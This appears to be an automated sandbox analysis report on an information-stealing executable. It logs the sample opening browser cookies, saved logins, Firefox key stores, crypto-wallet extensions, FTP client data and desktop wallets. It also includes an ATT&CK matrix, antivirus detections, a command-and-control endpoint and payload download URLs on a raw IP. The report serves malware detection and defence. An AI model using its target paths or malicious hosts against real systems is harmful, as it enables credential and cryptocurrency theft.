        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\QCOILOQIKCJump to behavior
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Windows Management Instrumentation
        1
        Registry Run Keys / Startup Folder
        12
        Process Injection
        1
        Masquerading
        2
        OS Credential Dumping
        1
        Query Registry
        Remote Services1
        Archive Collected Data
        11
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        1
        Registry Run Keys / Startup Folder
        34
        Virtualization/Sandbox Evasion
        LSASS Memory751
        Security Software Discovery
        Remote Desktop Protocol31
        Data from Local System
        11
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading
        12
        Process Injection
        Security Account Manager34
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive3
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
        Obfuscated Files or Information
        NTDS2
        Process Discovery
        Distributed Component Object ModelInput Capture114
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
        Software Packing
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain Credentials223
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        file.exe51%VirustotalBrowse
        file.exe100%AviraTR/Crypt.TPM.Gen
        file.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://property-imper.sbs/api9-0%Avira URL Cloudsafe
        https://property-imper.sbs:443/apiicrosoft0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        property-imper.sbs
        104.21.33.116
        truefalse
          high
          www.google.com
          172.217.21.36
          truefalse
            high
            s-part-0035.t-0009.t-msedge.net
            13.107.246.63
            truefalse
              high
              js.monitor.azure.com
              unknown
              unknownfalse
                high
                mdec.nelreports.net
                unknown
                unknownfalse
                  high
                  NameMaliciousAntivirus DetectionReputation
                  https://property-imper.sbs/apifalse
                    high
                    https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                      high
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_130.5.drfalse
                        high
                        https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_130.5.drfalse
                                high
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://www.linkedin.com/cws/share?url=$chromecache_110.5.dr, chromecache_122.5.drfalse
                                    high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/Youssef1313chromecache_130.5.drfalse
                                        high
                                        https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_110.5.dr, chromecache_122.5.drfalse
                                          high
                                          https://aka.ms/msignite_docs_bannerchromecache_110.5.dr, chromecache_122.5.drfalse
                                            high
                                            https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_122.5.drfalse
                                              high
                                              http://polymer.github.io/AUTHORS.txtchromecache_110.5.dr, chromecache_122.5.drfalse
                                                high
                                                https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_130.5.drfalse
                                                  high
                                                  https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_110.5.dr, chromecache_122.5.drfalse
                                                    high
                                                    https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_130.5.drfalse
                                                      high
                                                      http://x1.c.lencr.org/0file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://x1.i.lencr.org/0file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://aka.ms/pshelpmechoosechromecache_110.5.dr, chromecache_122.5.drfalse
                                                            high
                                                            https://aka.ms/feedback/report?space=61chromecache_130.5.dr, chromecache_131.5.drfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://learn-video.azurefd.net/vod/playerchromecache_110.5.dr, chromecache_122.5.drfalse
                                                                  high
                                                                  https://twitter.com/intent/tweet?original_referer=$chromecache_110.5.dr, chromecache_122.5.drfalse
                                                                    high
                                                                    https://github.com/gewarrenchromecache_130.5.drfalse
                                                                      high
                                                                      http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.2464188669.0000000000FCA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://polymer.github.io/CONTRIBUTORS.txtchromecache_110.5.dr, chromecache_122.5.drfalse
                                                                            high
                                                                            https://property-imper.sbs/api9-file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_130.5.drfalse
                                                                              high
                                                                              https://property-imper.sbs:443/apiicrosoftfile.exe, 00000000.00000002.2464239287.0000000001291000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_130.5.drfalse
                                                                                high
                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_110.5.dr, chromecache_122.5.drfalse
                                                                                  high
                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_110.5.dr, chromecache_122.5.drfalse
                                                                                    high
                                                                                    https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_110.5.dr, chromecache_122.5.drfalse
                                                                                      high
                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/Thrakachromecache_130.5.drfalse
                                                                                          high
                                                                                          http://polymer.github.io/PATENTS.txtchromecache_110.5.dr, chromecache_122.5.drfalse
                                                                                            high
                                                                                            https://aka.ms/certhelpchromecache_110.5.dr, chromecache_122.5.drfalse
                                                                                              high
                                                                                              http://185.215.113.16/steam/random.exefile.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
